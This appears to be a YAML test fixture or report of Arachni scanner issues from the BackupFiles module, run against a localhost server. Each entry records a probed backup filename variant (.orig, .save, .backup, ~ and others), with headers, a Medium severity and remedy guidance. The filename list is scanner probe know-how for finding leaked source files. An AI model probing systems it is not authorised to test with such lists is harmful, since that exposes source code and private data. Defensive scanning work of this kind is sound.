          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "22"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.temp
    injected: some_filename.php.temp
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.temp
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.temp
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.temp
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.temp
    injected: some_filename.temp
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.temp
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.temp
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.save
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "22"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.save
    injected: some_filename.php.save
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.save
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.save
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.save
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.save
    injected: some_filename.save
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.save
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.save
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.orig
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "22"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.orig
    injected: some_filename.php.orig
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.orig
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.orig
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.orig
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.orig
    injected: some_filename.orig
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.orig
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.orig
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.backup
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "24"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.backup
    injected: some_filename.php.backup
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.backup
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.backup
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.backup
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "20"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.backup
    injected: some_filename.backup
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.backup
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.backup
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.000
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.000
    injected: some_filename.php.000
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.000
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.000
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.000
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.000
    injected: some_filename.000
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.000
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.000
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php~
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php~
    injected: some_filename.php~
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php~
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php~
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename~
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "14"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename~
    injected: some_filename~
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename~
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename~
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php~1
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "19"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php~1
    injected: some_filename.php~1
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php~1
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php~1
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename~1
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "15"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename~1
    injected: some_filename~1
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename~1
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename~1
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.cs
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "20"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.cs
    injected: some_filename.php.cs
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.cs
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.cs
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.cs
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "16"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.cs
    injected: some_filename.cs
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
